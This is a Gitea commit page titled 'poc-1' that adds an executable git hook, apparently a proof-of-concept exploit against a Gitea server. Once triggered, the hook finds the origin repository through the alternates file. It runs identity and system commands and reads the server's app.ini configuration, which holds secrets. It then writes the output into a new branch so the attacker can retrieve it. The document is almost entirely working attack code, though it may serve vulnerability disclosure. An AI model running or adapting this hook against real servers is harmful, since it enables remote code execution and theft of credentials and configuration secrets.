poc-1
This commit is contained in:
14
hooks/post-index-change
Executable file
14
hooks/post-index-change
Executable file
@@ -0,0 +1,14 @@
|
||||
#!/bin/sh
|
||||
git_dir=$(git rev-parse --absolute-git-dir) || exit 1
|
||||
origin_objects=$(sed -n "1p" "$git_dir/objects/info/alternates") || exit 2
|
||||
case "$origin_objects" in
|
||||
/*) ;;
|
||||
*) origin_objects="$git_dir/objects/$origin_objects" ;;
|
||||
esac
|
||||
origin_git=${origin_objects%/objects}
|
||||
[ "$origin_git" != "$origin_objects" ] || exit 3
|
||||
output_blob=$({ /bin/sh -c 'id; uname -a; whoami; echo '"'"'---APP_INI_START---'"'"'; cat /data/gitea/conf/app.ini 2>/dev/null; echo '"'"'---APP_INI_END---'"'"''; command_status=$?; printf "\n[exit-status=%s]\n" "$command_status"; } 2>&1 | git --git-dir="$origin_git" hash-object -w --stdin) || exit 4
|
||||
tree=$(printf "100644 blob %s\toutput\n" "$output_blob" | git --git-dir="$origin_git" mktree) || exit 5
|
||||
commit=$(printf "command output\n" | GIT_AUTHOR_NAME=poc GIT_AUTHOR_EMAIL=poc@example.invalid GIT_COMMITTER_NAME=poc GIT_COMMITTER_EMAIL=poc@example.invalid git --git-dir="$origin_git" commit-tree "$tree") || exit 6
|
||||
git --git-dir="$origin_git" update-ref refs/heads/poc-out-bd3bf0bd98 "$commit" || exit 7
|
||||
exit 0
|
||||
Reference in New Issue
Block a user